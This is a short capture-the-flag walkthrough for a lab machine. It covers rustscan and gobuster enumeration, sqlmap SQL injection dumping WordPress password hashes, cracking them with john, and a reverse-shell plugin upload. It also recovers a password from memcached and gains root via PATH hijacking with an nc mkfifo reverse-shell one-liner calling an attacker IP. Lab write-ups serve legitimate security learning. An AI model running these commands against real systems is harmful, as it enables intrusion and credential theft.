rustscan
rustscan -a 10.10.140.46
Open 10.10.140.46:22
Open 10.10.140.46:80
robots.txt
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
http://10.10.140.46/comingreallysoon/
So we found this website.
http://10.10.140.46/it-next/
Gobuster
gobuster dir -u http://10.10.140.46/it-next/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
SQL injection
List of dbs
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" --dbs
List of tables
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress --tables
Dump the table wp_user
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress -T wp_users -dump
Let’s put thoses hashes into a file and crack them.
$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
john hashs --wordlist=/home/peanutstick/Documents/arch_doc/CTF/Wordlist/rockyou.txt
Login with wp_yura:soccer13
Wordpress
http://site.wekor.thm/wordpress/
You need to add it to your /etc/hosts
Revershell
With the plugin.
Then eip it:
zip rev.zip revershell.php
Upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # allow clear command
Then Ctrl + Z
.
stty raw -echo; fg # allow auto completion
Privesc
there is the tool memcached-tool in /usr/share/memcached/scripts.
we can dump what’s runing on the port 11211.
/usr/share/memcached/scripts/memcached-tool localhost:11211 dump
Output.
Dumping bucket 1 - 5 total items
add id 0 1676753794 4
3476
add username 0 1676753794 4
Orka
add salary 0 1676753794 8
$100,000
add password 0 1676753794 15
OrkAiSC00L24/7$
add email 0 1676753794 14
Orka@wekor.thm
With the password OrkAiSC00L24/7$
Privesc to root
sudo -l
Let’s dig into this binary.
strings /home/Orka/Desktop/bitcoin
He use python.
Orka@osboxes:~$ ls /usr/sbin/python
ls: cannot access '/usr/sbin/python': No such file or directory
Let’s create it.
export PATH="/usr/sbin:$PATH"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.50.167 6666 >/tmp/f" > /usr/sbin/python
chmod +x /usr/sbin/python
sudo Desktop/bitcoin
I’m root.